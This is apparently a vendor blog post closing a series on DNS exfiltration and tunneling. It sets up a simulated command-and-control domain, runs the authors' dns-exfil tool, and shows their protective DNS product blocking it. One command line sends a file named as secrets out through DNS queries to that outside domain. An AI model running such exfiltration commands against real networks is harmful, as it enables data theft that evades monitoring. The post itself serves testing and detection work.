In the first post of this series, An Introduction to Data Exfiltration and Tunneling via DNS, we introduced DNS exfiltration and tunneling and explained the process of building queries and how these techniques were being used today by malware and attackers. In the second post, Detecting DNS Exfiltration and Tunneling with UltraDDR, we gave an example of how DNS exfiltration works using sample data and then discussed how UltraDDR detects and blocks this activity.
In this post, we’ll pull it all together by demonstrating the process using a tool we’ve designed, giving you a firsthand look at these attacks. But that’s not all! We’ll also cover countermeasures, showing how UltraDDR, a cutting-edge cybersecurity solution, effectively blocks this tool. Lastly, we’ll analyze the logs, highlighting successfully obstructed queries.
To see the video showcasing the entire process, click here.
Setting up a simulated C2 domain.
To prepare for the demo, we registered the domain setandforget.xyz and created two wildcard resource records to simulate our authoritative DNS tunneling endpoint:
*.setandforget.xyz. 1799 IN A 35.153.230.115 *.setandforget.xyz. 1799 IN TXT “OK”
Register endpoint with UltraDDR.
To ensure UltraDDR can identify you, apply a specific policy, and associate your logs with a customer account, simply input your public IP address in the source networks configuration screen.
Using DNS-Exfil.
To explore how UltraDDR detects and blocks DNS exfiltration and tunneling, we need a tool to simulate this behavior. We wrote dns-exfil which is perfect for this job. It does all of the outbound DNS queries but without needing a custom authoritative server that understands how to receive the data.
To use dns-exfil, you clone it with git from our repository at https://github.com/rybolov/dns-exfil and set up a python virtual environment complete with the required libraries. Once the configuration is complete, you can launch dns-exfil and start sending data with the following command:
$ python3 ./main.py -t A -n 204.74.122.5 -d setandforget.xyz -f ./pirate.secrets.txt 
Checking the UltraDDR logs.
Within the UltraDDR web portal, navigate to the logs section. Apply a search filter for the specific domain to view the logs generated by dns-exfil.
You will observe that setandforget.xyz was blocked due to the domain and TLD being untrusted.
Series summary.
This series of posts has guided readers through the intricacies of DNS exfiltration and tunneling, the setup of a simulated authoritative DNS tunneling endpoint, and the use of UltraDDR to monitor and block these potential security threats.
In the first post, we explored the concept of DNS exfiltration and tunneling, highlighting their potential risks and a corresponding increase in auditor, red-team, and purple-team testing using these techniques. The second post delved into the query patterns of these activities and how UltraDDR detects and blocks them.
The third installment tied all these concepts together into a demo video and explanation of the steps that you can take inside your environment to prepare for a simulated dns exfiltration, use dns-exfil to perform a simulation test, and inspect the UltraDDR logs for signs of detection and blocking the exfiltration queries.
This series serves as a comprehensive guide to understanding and combating DNS exfiltration and tunneling threats, demonstrating real-world applications and solutions using our Protective DNS solution, UltraDDR.
To discover how UltraDDR can help protect your business, visit our product page!
